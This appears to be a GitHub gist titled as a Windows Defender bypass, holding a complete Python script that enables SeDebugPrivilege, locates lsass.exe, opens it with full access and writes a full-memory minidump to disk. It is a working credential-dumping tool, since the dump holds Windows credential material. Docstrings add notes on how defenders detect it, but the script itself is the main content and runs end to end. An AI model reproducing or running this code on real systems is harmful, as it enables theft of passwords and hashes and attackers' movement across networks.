@MohitDabas
Created October 1, 2024 20:34
Windows Defender Bypass Dump LSASS Memory with Python
import win32api
import win32con
import win32process
import win32security
import win32file # For CreateFile
import ctypes
from ctypes import wintypes
import os
import psutil
# Constants for MiniDumpWriteDump function
MiniDumpWithFullMemory = 0x00000002  # MINIDUMP_TYPE flag: the dump includes all of the target's memory
PROCESS_QUERY_INFORMATION = 0x0400  # not referenced elsewhere in this file
PROCESS_VM_READ = 0x0010  # not referenced elsewhere in this file
PROCESS_ALL_ACCESS = 0x1F0FFF  # the access mask actually passed to OpenProcess below
# ctypes.windll exists only on Windows; this line raises AttributeError elsewhere.
dbghelp = ctypes.windll.dbghelp
# MiniDumpWriteDump function argument types
dbghelp.MiniDumpWriteDump.argtypes = [
    wintypes.HANDLE, # Process handle
    wintypes.DWORD, # Process ID
    wintypes.HANDLE, # File handle
    wintypes.DWORD, # Dump type
    wintypes.LPVOID, # Exception parameter (can be NULL)
    wintypes.LPVOID, # User stream parameter (can be NULL)
    wintypes.LPVOID # Callback parameter (can be NULL)
]
# wintypes.BOOL is a C long, so the call returns a Python int (0 on failure), not a bool.
dbghelp.MiniDumpWriteDump.restype = wintypes.BOOL # Return type is BOOL
# Enable SeDebugPrivilege to access system processes like LSASS
def enable_debug_privilege() -> None:
    """Try to enable SeDebugPrivilege on the current process token.

    Looks up the LUID for SE_DEBUG_NAME, opens the current process token with
    TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY and asks for the privilege to be
    enabled. Every exception is caught and only printed, and nothing is
    returned, so the caller cannot tell whether the privilege is actually held.

    Defender note: a token-right adjustment like this is an audited event when
    "Audit Token Right Adjusted" (event 4703) is enabled, and SeDebugPrivilege
    being enabled by a non-debugger process is a common precursor signal for
    credential dumping.
    """
    try:
        privilege_name = win32security.LookupPrivilegeValue(None, win32security.SE_DEBUG_NAME)
        token = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERY)
        # NOTE(review): AdjustTokenPrivileges is documented to succeed even when
        # the token does not hold the privilege (it then reports
        # ERROR_NOT_ALL_ASSIGNED via GetLastError); that case is not checked
        # here, so the message below can be printed without the privilege
        # having been granted. Confirm how the pywin32 wrapper surfaces it.
        win32security.AdjustTokenPrivileges(token, False, [(privilege_name, win32security.SE_PRIVILEGE_ENABLED)])
        print("SeDebugPrivilege enabled.")
    except Exception as e:
        print(f"Failed to enable SeDebugPrivilege: {e}")
# Function to find LSASS process
def get_lsass_pid() -> int | None:
    """Return the PID of the first process named ``lsass.exe``, or None.

    The name comparison is case-insensitive. Processes whose name cannot be
    read (psutil.AccessDenied / psutil.NoSuchProcess) are skipped silently;
    any other exception raised during enumeration is printed and None is
    returned. If several processes match, only the first one psutil yields
    is returned.
    """
    try:
        for proc in psutil.process_iter():
            try:
                if proc.name().lower() == "lsass.exe":
                    print(f"Found LSASS process: PID = {proc.pid}")
                    return proc.pid
            except (psutil.AccessDenied, psutil.NoSuchProcess):
                # Short-lived or protected processes: ignore and keep scanning.
                pass
    except Exception as e:
        print(f"Error accessing processes: {e}")
    return None
# Function to write a minidump of the LSASS process
def write_lsass_minidump(output_path: str):
    """Write a full-memory minidump of lsass.exe to ``output_path``.

    Steps, in order: locate lsass.exe via get_lsass_pid(), open it with
    PROCESS_ALL_ACCESS, create/overwrite the output file, and call
    dbghelp!MiniDumpWriteDump with MiniDumpWithFullMemory.

    Returns False when the process is not found, cannot be opened, or the
    file cannot be created; otherwise returns the raw MiniDumpWriteDump
    result (an int, non-zero on success, because restype is wintypes.BOOL).

    Defender note: a cross-process handle open on lsass.exe followed by a
    MiniDumpWriteDump into a file is the canonical credential-dumping
    pattern. The handle open is what Sysmon ProcessAccess (Event ID 10) and
    EDR sensors key on, and with LSA protection (RunAsPPL) enabled the
    OpenProcess call is expected to fail for unprotected callers. The output
    file holds credential material and should be treated as such.
    """
    pid = get_lsass_pid()
    if not pid:
        print("LSASS process not found.")
        return False
    print(f"Found LSASS process with PID: {pid}")
    # Open the LSASS process
    # Full access is requested here (see PROCESS_ALL_ACCESS above). pywin32's
    # OpenProcess raises pywintypes.error on failure rather than returning a
    # null handle, so the falsy check below is mostly a second line of defence.
    h_process = win32api.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    if not h_process:
        print(f"Failed to open LSASS process with PID: {pid}")
        return False
    # Create a file to write the dump using win32file
    # CREATE_ALWAYS: an existing file at output_path is truncated and overwritten.
    h_file = win32file.CreateFile(
        output_path,
        win32con.GENERIC_WRITE,
        0,
        None,
        win32con.CREATE_ALWAYS,
        win32con.FILE_ATTRIBUTE_NORMAL,
        None
    )
    # NOTE(review): the pywin32 CreateFile wrapper also raises on failure, so
    # this branch is unlikely to be reached; an exception propagates out of the
    # function with h_process still open. Confirm against the pywin32 version used.
    if h_file == win32file.INVALID_HANDLE_VALUE:
        print("Failed to create dump file.")
        return False
    # Ensure the process and file handles are explicitly cast to ctypes-compatible handles
    # PyHANDLE objects support int(); the raw values are wrapped so they match
    # the wintypes.HANDLE argtypes declared on dbghelp.MiniDumpWriteDump.
    h_process_ctypes = ctypes.wintypes.HANDLE(int(h_process))
    h_file_ctypes = ctypes.wintypes.HANDLE(int(h_file))
    # Call MiniDumpWriteDump to write the minidump to the file
    success = dbghelp.MiniDumpWriteDump(
        h_process_ctypes, # Process handle (ctypes HANDLE)
        pid, # Process ID (as integer)
        h_file_ctypes, # File handle (ctypes HANDLE)
        MiniDumpWithFullMemory, # Dump type
        None, # Exception parameter (can be NULL)
        None, # User stream parameter (can be NULL)
        None # Callback parameter (can be NULL)
    )
    if success:
        print(f"Minidump written successfully to {output_path}")
    else:
        # ctypes.GetLastError() reads the thread's last-error value; it is
        # read after the print formatting, so it reflects the dbghelp call
        # unless another Win32 call intervenes.
        print(f"Failed to write minidump for LSASS. Error: {ctypes.GetLastError()}")
    # Close the file handle
    win32file.CloseHandle(h_file)
    # Close the process handle
    win32api.CloseHandle(h_process)
    return success
# Enable SeDebugPrivilege before writing minidump
# enable_debug_privilege() returns None and only prints on failure, so the
# script proceeds to the dump attempt regardless of whether it succeeded.
enable_debug_privilege()
# Specify the path for the minidump file
# The dump lands in the current working directory, i.e. wherever the script is launched from.
dump_file_path = os.path.join(os.getcwd(), "lsass.dmp")
# Write the minidump
# write_lsass_minidump returns False on the early-exit paths and the raw
# MiniDumpWriteDump int otherwise; both are used only for truthiness here.
if write_lsass_minidump(dump_file_path):
    print("Minidump operation completed.")
else:
    print("Minidump operation failed.")